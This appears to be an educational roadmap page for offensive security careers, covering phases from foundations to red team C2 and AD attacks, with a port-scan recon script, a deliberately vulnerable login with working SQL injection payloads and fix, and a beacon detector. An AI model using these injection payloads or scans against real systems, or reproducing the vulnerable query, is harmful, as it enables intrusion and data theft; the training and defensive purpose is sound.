Offensive Security Roadmap: Red Team / Penetration Tester
Philosophy: if all you can do is run nmap -sV target, that means you can scan. If you can enumerate → exploit → escalate privileges → pivot → exfiltrate → write a professional report, that means you understand the kill chain end to end, and that is what gets asked in interviews. A recruiter will ask "OK, you got a user shell. Then what?" If you answer "I enumerated SUID binaries, found a misconfigured sudo rule, escalated to root, then pivoted to another machine with an SSH key I found in a home directory", that closes the question.
Legal Warning
Every technique on this page may only be practised in your own lab or on a legal platform (HackTheBox, TryHackMe, PentesterLab). Scanning or exploiting anything without written authorisation is a criminal offence. No exceptions.
Starting Checkpoint: Before You Begin
Stack: Kali Linux VM → Metasploitable/DVWA (target) on Proxmox
Path: Penetration Tester / Red Team Operator
Hardware: i7 7th gen, 8GB RAM, GTX 1050
Career target: Junior Pentester → Pentester → Red Team Operator → APT Simulator
Learning order:
Phase 1 (foundations): Linux + Networking + Python scripting
Phase 2 (recon & exploit): Nmap → Burp Suite → Metasploit → SQLMap
Phase 3 (post-exploit): PrivEsc → BloodHound → AD attacks → Lateral movement
Phase 4 (red team ops): C2 framework → Evasion → Purple team validation
Phase 5 (professional): Report writing → Methodology → Lab exam
Next step: set up the Kali VM + a target VM (Metasploitable3 or the HackTheBox VPN)
Phase 1: Mandatory Foundations (Weeks 1-6)
Goal: without these foundations every tool is just a button you press without understanding why. RAM impact: minimal, a text editor and a terminal.
| Skill | What You Learn | Combo A+B That Proves It |
|---|---|---|
| Linux CLI mastery | Bash scripting, file permissions, process management, service control | Linux + a bash one-liner that automates recon = you can build your own tooling |
| Networking deep dive | TCP handshake, HTTP methods, DNS resolution, ARP, routing, NAT, firewall bypass | Networking + Wireshark analysis = you understand what happens on the wire |
| Python for hacking | Socket programming, HTTP requests, parsing, automation, pwntools | Python + a custom exploit script = you are not a script kiddie |
| Web fundamentals | HTTP/HTTPS, cookies, sessions, CORS, CSP, SOP, OAuth flows | Web + manual request crafting (curl/Burp) = you understand the web attack surface |
Don't Skip This
Most people who fail OSCP do not fail because the exploits are hard; they fail because their Linux, networking and scripting foundations are weak. Phase 1 decides everything.
Phase 1 portfolio project:
Custom recon tool: a Python script that automatically resolves DNS → port scans → grabs banners → screenshots web services → writes a markdown report. It shows you can automate, not just click buttons.
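A skeleton for that project, added here as an example and not the page's own tool: DNS resolution, a threaded TCP connect scan, banner grabbing and the markdown report. The target name, port list and the web-screenshot step are left out or assumed (scanme.nmap.org is only a placeholder that Nmap's authors explicitly allow scanning; the probe function is injectable so the pipeline can be exercised offline with a fake).

```python
"""Added recon pipeline example (not the page's own tool): resolve -> TCP connect
scan -> banner grab -> markdown report. Target and ports are placeholders."""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

COMMON_PORTS = [21, 22, 25, 80, 110, 139, 443, 445, 3306, 8080]
HTTP_PORTS = {80, 8000, 8080}  # plain-HTTP ports need a request before they answer


def resolve(hostname):
    """Return the sorted set of IPv4 addresses a hostname resolves to."""
    infos = socket.getaddrinfo(hostname, None, socket.AF_INET, socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def probe_port(ip, port, timeout=1.5):
    """TCP connect probe: (port, banner) if open, None if closed or filtered.
    Full three-way handshake, so no raw sockets and no root required."""
    try:
        with socket.create_connection((ip, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            if port in HTTP_PORTS:
                # HTTP servers wait for the client; SSH/FTP/SMTP speak first.
                sock.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % ip.encode())
            try:
                raw = sock.recv(512)
            except socket.timeout:
                raw = b""
    except OSError:  # refused, timed out (a subclass of OSError), unreachable
        return None
    return port, raw.decode("latin-1", "replace").strip() or None


def scan(ip, ports, prober=probe_port, workers=64):
    """Probe ports concurrently. `prober` is injectable for offline testing."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: prober(ip, p), ports))
    return sorted(r for r in results if r is not None)


def guess_service(banner):
    """Cheap banner heuristics; nmap -sV does this far better, this is the idea."""
    if not banner:
        return "unknown"
    head = banner.split("\n", 1)[0].strip()
    if head.startswith("SSH-"):
        return "ssh"
    if head.startswith("HTTP/"):
        return "http"
    if head.startswith("220") and "FTP" in head.upper():
        return "ftp"
    if head.startswith("220"):
        return "smtp"
    return "unknown"


def to_markdown(target, ip, results):
    """Render the scan as the markdown report the portfolio project asks for."""
    lines = [f"# Recon report: {target}", "", f"- Resolved IP: {ip}",
             f"- Open ports: {len(results)}", "",
             "| Port | Service | Banner |", "|---|---|---|"]
    for port, banner in results:
        first = (banner or "").split("\n", 1)[0].strip().replace("|", "\\|")
        lines.append(f"| {port} | {guess_service(banner)} | {first} |")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "scanme.nmap.org"  # placeholder
    for addr in resolve(target):
        print(to_markdown(target, addr, scan(addr, COMMON_PORTS)))
```

The connect scan is the same thing nmap -sT does; the point of writing it yourself is that you can explain why a refused connection, a timeout and a banner mean three different things about the port.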
Phase 2: Reconnaissance & Exploitation (Weeks 7-16)
Goal: from an unknown target to initial access. This is the core of a pentest. RAM impact: Kali VM ~2GB + target VM ~1GB = ~3GB.
| Tool/Skill | RAM | What You Learn | Combo A+B That Proves It |
|---|---|---|---|
| Nmap | ~100MB | Port scanning, service detection, NSE scripts, OS fingerprinting | Nmap + a service-specific exploit = you can go from scan to shell |
| Burp Suite | ~500MB | Web proxy, interceptor, Repeater, Intruder, scanner (Pro only) | Burp + a manual finding = you understand the web vuln, not just the automated scan |
| Metasploit | ~400MB | Exploit framework, Meterpreter, post-exploitation modules | Metasploit + reproducing the exploit without Metasploit = you understand the exploit mechanics |
| SQLMap / manual SQLi | ~100MB | SQL injection: union-based, blind, time-based, error-based | SQLMap + manual injection = you can explain why the query is injectable |
| Gobuster / ffuf | ~50MB | Directory brute force, vhost enumeration, parameter fuzzing | Gobuster + a custom wordlist = you understand attack surface discovery |
Don't Be a Script Kiddie
For every automated tool you use, make sure you can do the same thing by hand. Recruiters WILL ask: "OK, Metasploit got you a shell. Now do it without Metasploit." If you can't, you are not a pentester, you are a tool operator.
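The SQLMap row above asks you to explain why a query is injectable. The following is an added example (not code from the page) that does exactly that by hand on an in-memory SQLite database with constructed rows: a deliberately string-built login query, the three payload classes SQLMap would try against it (comment bypass, UNION, boolean-blind), and the parameterised version that stops all three. Table and credentials are constructed for the demo.

```python
"""Added example (not from the page): why a string-built SQL query is injectable,
three payload classes against it, and the parameterised fix. In-memory SQLite
with constructed rows, so it runs offline."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('admin', 'S3cret!', 'admin'),
            ('bob',   'hunter2', 'user');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: user input is concatenated into the SQL text, so
    a quote in the input changes the structure of the query, not just a value."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Fixed: placeholders send the values out of band; a quote stays data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


def auth_bypass(conn):
    """Comment injection: username admin'-- comments out the password check."""
    return login_vulnerable(conn, "admin'--", "anything")


def union_dump(conn):
    """UNION-based: the original SELECT has two columns, so a two-column
    UNION SELECT appends every credential row to the result set."""
    return login_vulnerable(conn, "' UNION SELECT username, password FROM users--", "x")


def blind_extract(conn, column, row_id, max_len=32):
    """Boolean-based blind: nothing is echoed, only 'login succeeded or not'.
    Each query asks 'is character N of the secret equal to code C?' and the
    row count is the oracle. This is what sqlmap automates with --technique=B."""
    extracted = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = (f"' OR (SELECT unicode(substr({column}, {pos}, 1)) "
                       f"FROM users WHERE id = {row_id}) = {code}--")
            if login_vulnerable(conn, payload, "x"):
                extracted += chr(code)
                break
        else:
            break  # substr past the end is '', unicode('') is NULL: no match, done
    return extracted


if __name__ == "__main__":
    db = make_db()
    print("bypass:", auth_bypass(db))
    print("dump  :", union_dump(db))
    print("blind :", blind_extract(db, "password", 1))
    print("safe  :", login_safe(db, "admin'--", "anything"))
```

The blind loop is 95 requests per character at worst; sqlmap narrows that with a binary search on the code point, which is the only real difference between this and --technique=B. Time-based blind is the same oracle with a sleep instead of a row count.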
Phase 2 portfolio project:
HackTheBox/TryHackMe writeups: document 10+ machines you have solved. Every writeup needs: recon methodology → vulnerability analysis → exploitation → proof of concept → remediation recommendation. Publish on GitHub or a blog.
Phase 3: Post-Exploitation & Active Directory (Weeks 17-26)
Goal: from user shell to domain admin. This is what separates a pentester from a button clicker. RAM impact: an AD lab needs ~4-5GB (DC + client). On an 8GB host, shut down every other VM and service while it runs.
| Skill/Tool | RAM | What You Learn | Combo A+B That Proves It |
|---|---|---|---|
| Linux PrivEsc | n/a | SUID binaries, cron abuse, PATH hijacking, kernel exploits, capability abuse | PrivEsc + your own enumeration = you can escalate without LinPEAS |
| Windows PrivEsc | n/a | Token impersonation, service misconfiguration, UAC bypass, Potato attacks | PrivEsc + manual checks = you understand the Windows privilege model |
| BloodHound | ~500MB | Active Directory attack path analysis: graph visualisation to find privilege escalation paths in AD | BloodHound + custom Cypher queries = you can identify attack paths the default queries miss |
| CrackMapExec | ~200MB | Swiss army knife for Windows/AD pentesting: credential spraying, command execution, enumeration and lateral movement (the CME project is archived; its maintained fork NetExec keeps the same workflow) | CME + a pass-the-hash chain = you can move laterally without a plaintext password |
| Impacket | ~150MB | Python library for network protocols: SMB, MSRPC, LDAP, Kerberos. The foundation of many Windows exploitation tools | Impacket + a custom script = you can build your own Windows exploitation tooling |
| Active Directory attacks | ~4GB | Kerberoasting, AS-REP roasting, Pass-the-Hash, DCSync, Golden Ticket | AD + the full attack chain = you understand enterprise environments |
| Lateral movement | n/a | SSH pivoting, port forwarding, proxychains, chisel, ligolo-ng | Pivot + multi-hop network = you can operate in a segmented network |
| Persistence | n/a | Scheduled tasks, registry, WMI, SSH keys, web shells | Persistence + detection evasion = you understand what the Blue Team looks for |
Tool References
BloodHound, CrackMapExec and Impacket are the three tools that connect Phase 3 with Application_Offensive.html. Without understanding all three, AD attacks cannot be executed systematically.
Cheap AD Lab
Proxmox → Windows Server 2019 evaluation (free for 180 days) + Windows 10 evaluation → set up a domain. Or use GOAD (Game of Active Directory), an automated AD lab deployed with Vagrant and Ansible. It is the most complete free AD lab available.
Phase 3 portfolio project:
Active Directory attack lab, full kill chain: document initial access (phishing simulation) → BloodHound enumeration → Kerberoasting → CrackMapExec lateral movement → Pass-the-Hash → Impacket DCSync → Golden Ticket → domain admin. Include a kill chain diagram and defensive recommendations.
Phase 4: Red Team Operations & C2 (Weeks 27-34)
Goal: from pentester to red team operator. C2 frameworks and evasion are the line that separates the two. RAM impact: C2 server + target = ~3-4GB. The C2 framework itself is light, but it needs multiple VMs.
| Skill/Tool | RAM | What You Learn | Combo A+B That Proves It |
|---|---|---|---|
| Sliver C2 | ~300MB | Open-source C2 framework: cross-platform implants, multiplayer mode, DNS/HTTP/HTTPS beaconing | Sliver + a custom HTTP C2 profile = you can shape traffic to resemble a legitimate app |
| Havoc C2 | ~400MB | Modern post-exploitation C2: sleep obfuscation, x64 return address spoofing, indirect syscalls | Havoc + a sleep obfuscation config = you understand how EDR memory scanners are evaded |
| Mythic | ~500MB | Collaborative red teaming platform: Docker-based agents, real-time callbacks, extensible payloads | Mythic + custom agent development = you can extend capability with C/C++ code |
| Cobalt Strike (trial) | ~600MB | Commercial adversary simulation: malleable C2 profiles, beaconing, post-exploitation toolkit | CS + profile customisation = you understand traffic shaping to get past an NGFW |
| Evasion basics | n/a | Sleep obfuscation, indirect syscalls, AMSI bypass (concept), ETW bypass (concept) | Evasion + EDR testing = you understand what the Blue Team detects and why |
| Atomic Red Team | ~200MB | Library of tests mapped to MITRE ATT&CK: simulate real TTPs to validate detection | Atomic + a custom test = you can validate the blue team's detection capability |
| Caldera | ~1GB | Adversary emulation platform by MITRE: automate ATT&CK TTPs, plan operations | Caldera + operation planning = you can measure an organisation's defensive coverage |
Evasion = Concept, Not Illegal Practice
The evasion techniques here are studied as concepts, to understand what EDR detects. Implementing full evasion needs a dedicated environment and legal clearance. Never practise it in production.
Purple Team Mindset
A good Red Team operator understands what the Blue Team sees. Every time you run a C2, ask: "which alert fires in the SIEM?" If you don't know, you are not Red Team, you are a black box.
Phase 4 portfolio project:
Purple team exercise, C2 vs detection: set up Sliver/Havoc → run an implant → capture the traffic → analyse what Wazuh/Suricata detects → write a detection gap analysis. It shows you understand both sides.
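The analysis step of that exercise, as an added example rather than the page's own material: the classic beacon detector a Blue Team runs over connection logs, so you can see what your implant's sleep and jitter settings look like from the other side. The log lines are constructed (timestamp, source, destination, port, trimmed from a Zeek conn.log shape); the implant host and C2 addresses are placeholders.

```python
"""Added example (not the page's code): beacon detection over a connection log.
Per (src, dst, dport) pair it measures how regular the gaps between connections
are; a low coefficient of variation means machine timing, not a human."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample. 10.0.0.7 -> 203.0.113.10:443 checks in every ~60 s with
# ~10% jitter (an implant); 10.0.0.7 -> 198.51.100.5:443 is bursty browsing.
SAMPLE_LOG = """\
ts src dst dport
1700000000 10.0.0.7 203.0.113.10 443
1700000058 10.0.0.7 203.0.113.10 443
1700000121 10.0.0.7 203.0.113.10 443
1700000177 10.0.0.7 203.0.113.10 443
1700000240 10.0.0.7 203.0.113.10 443
1700000298 10.0.0.7 203.0.113.10 443
1700000362 10.0.0.7 203.0.113.10 443
1700000419 10.0.0.7 203.0.113.10 443
1700000480 10.0.0.7 203.0.113.10 443
1700000537 10.0.0.7 203.0.113.10 443
1700000003 10.0.0.7 198.51.100.5 443
1700000005 10.0.0.7 198.51.100.5 443
1700000006 10.0.0.7 198.51.100.5 443
1700000090 10.0.0.7 198.51.100.5 443
1700000091 10.0.0.7 198.51.100.5 443
1700000400 10.0.0.7 198.51.100.5 443
1700000401 10.0.0.7 198.51.100.5 443
1700000402 10.0.0.7 198.51.100.5 443
1700000530 10.0.0.7 198.51.100.5 443
1700000531 10.0.0.7 198.51.100.5 443
"""


def parse_log(text):
    """Skip the header line; return (ts, src, dst, dport) tuples."""
    rows = []
    for line in text.splitlines()[1:]:
        ts, src, dst, dport = line.split()
        rows.append((float(ts), src, dst, int(dport)))
    return rows


def beacon_scores(rows, min_conns=8):
    """For each pair with enough connections: count, mean gap, and the
    coefficient of variation (stdev / mean) of the inter-arrival gaps."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in rows:
        by_pair[(src, dst, dport)].append(ts)
    scores = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        scores[pair] = {"count": len(stamps), "mean_gap": m,
                        "cv": pstdev(gaps) / m if m else float("inf")}
    return scores


def flag_beacons(scores, max_cv=0.25):
    """Uniform +/-50% jitter gives CV of about 0.29 (1/sqrt(12)), so a 0.25
    threshold catches the default low-jitter configs and misses heavy jitter;
    tune it against a capture of your own implant."""
    return sorted(pair for pair, s in scores.items() if s["cv"] <= max_cv)


if __name__ == "__main__":
    scores = beacon_scores(parse_log(SAMPLE_LOG))
    for pair, s in scores.items():
        print(pair, f"n={s['count']} mean={s['mean_gap']:.1f}s cv={s['cv']:.2f}")
    print("beacon-like:", flag_beacons(scores))
```

This is the detection gap you are documenting: with jitter at 0 the implant is flagged at count 8, with jitter at 50% the CV climbs above the threshold and only volume-over-time or destination reputation catches it. Write both numbers in the gap analysis.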
Phase 5: Professionalisation & Certification (Weeks 35-40)
Goal: from hacker to professional pentester/red team operator. Report writing and methodology are what make the difference.
| Skill | What You Learn | Combo A+B That Proves It |
|---|---|---|
| Report writing | Executive summary, findings, severity rating (CVSS), remediation, evidence | Report + a professional template = you can deliver to a client |
| Methodology | OWASP Testing Guide, PTES, OSSTMM, MITRE ATT&CK mapping | Methodology + a structured approach = you are not a random scanner |
| OSCP lab | Real pentest lab: 70+ machines, 24-hour exam, report submission | OSCP pass = the industry gold standard. It opens doors |
| Bug bounty | HackerOne, Bugcrowd: real targets, real money, real experience | Bug bounty + hall of fame / payout = proof of skill that cannot be faked |
Phase 5 portfolio project:
Professional penetration test report: a full report template with scope, methodology, executive summary, technical findings (with screenshots + PoC), risk rating, remediation timeline. A format that can go straight to a client.
Red Team Operator Tracks (Specialisations)
After Phase 5, pick a specialisation based on your interests and career target:
Track A: Corporate Red Team
Focus: simulating real APTs in an enterprise environment. Custom implants, long-term persistence, data exfiltration simulation.
| Skill | Tool | Level |
|---|---|---|
| Custom C2 development | Sliver Armory, NimPlant, Mythic agent dev | Danger |
| Evasion engineering | ScareCrow, Inceptor, PEzor, AceLdr | Danger |
| Physical security assessment | Flipper Zero, USB Rubber Ducky, LAN Turtle | Warning |
| Social engineering campaigns | GoPhish, SET, custom pretext development | Warning |
Track B: Web Application Specialist
Focus: deep dive into web security, API security, cloud-native applications.
| Skill | Tool | Level |
|---|---|---|
| Advanced web exploitation | Burp Suite Pro, custom extension development | Warning |
| API security testing | Postman, Arjun, custom fuzzing | Intermediate |
| Cloud pentesting | ScoutSuite, Prowler, CloudFox | Warning |
| Bug bounty hunting | Custom automation, recon pipeline | Intermediate |
Track C: Infrastructure / Network Pentester
Focus: network segmentation testing, firewall bypass, wireless assessment.
| Skill | Tool | Level |
|---|---|---|
| Network protocol exploitation | Scapy, custom Impacket scripts, Responder | Warning |
| Wireless security assessment | Aircrack-ng, Bettercap, WiFi Pineapple | Warning |
| VoIP / telecom pentesting | SIPVicious, Viproy | Danger |
| Mainframe / legacy systems | TN3270 exploitation, custom protocols | Danger |
Track D: APT Simulator / Nation-State Level
Focus: simulating advanced threat actors. Custom malware, zero-day research, hardware implants.
| Skill | Tool | Level |
|---|---|---|
| Custom malware development | C/C++ implants, position-independent shellcode | Danger |
| Hardware implants | O.MG Cable, malicious USB devices, PCIe DMA | Danger |
| Supply chain attacks | Dependency confusion, typosquatting, CI/CD poisoning | Danger |
| Zero-day research | Fuzzing, reverse engineering, vulnerability discovery | Danger |
Track D Boundary
Track D requires a clear legal framework; it is normally run only by government agencies, the military, or contractors with clearance. Do not explore it without legal backing.
Visual Roadmap: 10-Month Timeline
| Month | Phase | Topics | Portfolio |
|---|---|---|---|
| 1-2 | Phase 1 | Linux CLI, Networking, Python, Web basics | Custom recon tool |
| 3-4 | Phase 2 | Nmap, Burp Suite, Metasploit, Web exploits | 10 HTB writeups |
| 5-6 | Phase 2-3 | Linux PrivEsc, Windows PrivEsc, Pivot/Tunnel | PrivEsc lab |
| 7-8 | Phase 3 | BloodHound, CrackMapExec, Impacket, AD full chain | AD kill chain doc |
| 9 | Phase 4 | Sliver C2, Havoc C2, Evasion, Atomic Red Team, Caldera | Purple team exercise |
| 10 | Phase 5 | OSCP lab, Report, Bug bounty | OSCP exam + report |
Certifications That Fit Each Phase
| Phase | Certification | Why |
|---|---|---|
| After Phase 1 | eJPT (eLearnSecurity Junior Penetration Tester) | Entry level, cheap (~$250), validates the foundations |
| After Phase 2-3 | PNPT (Practical Network Penetration Tester) | Practical exam + report, more realistic than CEH |
| After Phase 4 | OSCP (Offensive Security Certified Professional) | THE gold standard. Most pentest job postings ask for it |
| After Phase 5 | OSEP (Offensive Security Experienced Penetration Tester) | Evasion, C2, antivirus bypass: Red Team level |
| Track A / D | CRTO (Certified Red Team Operator) | C2 frameworks, adversary simulation, detection evasion |
| Track B | OSWE (Offensive Security Web Expert) | Web application exploitation expert |
Practice Platforms (Free → Paid)
| Platform | Type | Price | Good For |
|---|---|---|---|
| TryHackMe | Guided labs | Free (limited) / $10/month | Beginners, structured learning paths |
| HackTheBox | Challenge labs | Free (retired machines) / $14/month | Intermediate, real-world simulation |
| PentesterLab | Web exploitation | $20/month | Web security deep dive |
| GOAD Lab | AD lab | Free | Active Directory, self-hosted |
| VulnHub | Downloadable VMs | Free | Offline practice |
| CyberDefenders | Blue team labs (defensive side) | Free | Purple team exercises |
See Also
- Master Index
- Endpoint Security: CPU ring & boot chain threats
- Cheat Engine: game hacking = offensive security in a gaming context
- Hardware Hacking: binary exploitation & firmware RE
- Underground Knowledge: the dual-use technique landscape
- Cyber Security Roadmap: the other side, Blue Team defence
- Master Arsenal: HTML arsenal tool reference
- Offensive Security Hierarchy: Level 0-6 offensive hierarchy (separate page)
Offensive Security Roadmap | Phase 1 (Foundations) → Phase 5 (OSCP) → Track D (APT Simulator) · 10 Months